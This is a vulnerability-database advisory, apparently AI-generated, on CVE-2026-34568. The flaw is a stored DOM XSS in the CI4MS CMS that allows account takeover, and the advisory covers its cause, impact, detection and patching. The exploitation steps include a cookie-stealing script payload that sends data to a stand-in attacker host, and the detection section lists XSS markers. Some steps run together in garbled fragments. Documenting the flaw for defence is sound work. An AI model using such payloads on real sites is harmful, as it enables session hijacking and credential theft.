
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34568 is a stored DOM-based Cross-Site Scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton, titled "Blogs Posts Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS." The vulnerability affects all CI4MS versions up to and including 0.28.6.0, and was published on March 31, 2026, with a patch released in version 0.31.0.0. It carries a CVSS v3.1 base score of 9.1 (Critical) per the GitHub Advisory, with an alternate score of 9.0 reported by Feedly (GitHub Advisory, Feedly).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored DOM XSS variant. The application fails to sanitize user-controlled input in the blog post creation and editing functionality (/backend/blogs/create, /backend/blogs/), allowing malicious JavaScript payloads to be stored server-side without encoding. These payloads are subsequently rendered unsafely across multiple application views — including the administrative panel and public blog page (/blog/{id}) — via unsafe DOM manipulation methods such as .html() or innerHTML, without output encoding. No sanitization mechanisms were in place prior to the patch (GitHub Advisory, Security Advisory).
Successful exploitation enables persistent execution of arbitrary JavaScript in the browsers of any user who views the compromised blog post, including administrators. This can lead to full account takeover across all user roles, privilege escalation (e.g., a low-privileged attacker gaining administrator-level access), session hijacking, and credential theft. The scope change in the CVSS score reflects that the impact extends beyond the attacker's own session to affect all users of the application, with high confidentiality impact and potential for complete application compromise (GitHub Advisory, Feedly).
A proof-of-concept exploit, including a video PoC, is publicly available via the GitHub security advisory and a Mega.nz link referenced therein. The vulnerability requires only low privileges (an authenticated user with blog post creation/editing rights) and, per the advisory's CVSS scoring, no user interaction is required for the payload to persist — though victims must view the post for execution. There is no current evidence of in-the-wild exploitation, no threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.021% (6th percentile), indicating a low near-term exploitation probability (GitHub Advisory, Feedly).
/backend/blogs/ or the public blog page./backend/blogs/create (or edit an existing post). Insert a malicious JavaScript payload into the blog post content field, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or a more sophisticated DOM-based payload targeting unsafe sinks./blog/{id} or the administrative panel at /backend/blogs/./backend/blogs/create or /backend/blogs/edit containing encoded JavaScript tags (<script>, onerror=, javascript:, etc.)./backend/blogs/create, /backend/blogs/, or /blog/{id} with payloads containing HTML/JavaScript injection strings; application logs recording blog post saves with suspicious content fields.<script>, <script>, %3Cscript%3E) in content fields.Upgrade CI4MS to version 0.31.0.0 or later, which includes global input validation, enhanced CSRF token handling, and XSS/CSRF protection as part of a major security overhaul integrating CodeIgniter Shield. As an interim workaround, restrict blog post creation and editing permissions to trusted administrators only, and implement a strict Content Security Policy (CSP) header to limit unauthorized script execution. Additionally, set HttpOnly, SameSite, and Secure attributes on session cookies to reduce the impact of any successful XSS exploitation (GitHub Release, GitHub Advisory).
The vulnerability was reported by researchers bugmithlegend and peeefour and published by the repository maintainer bertugfahriozer. A threat intelligence write-up was published by The Hacker Wire covering the stored XSS and a related blind XSS in the logs interface. The advisory was picked up by multiple vulnerability aggregators including VulDB, CIRCL, ENISA EUVD, and CVEFeed shortly after disclosure, and a Bluesky post was noted in the Feedly timeline. No major vendor statements or widespread community controversy have been observed (Feedly).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."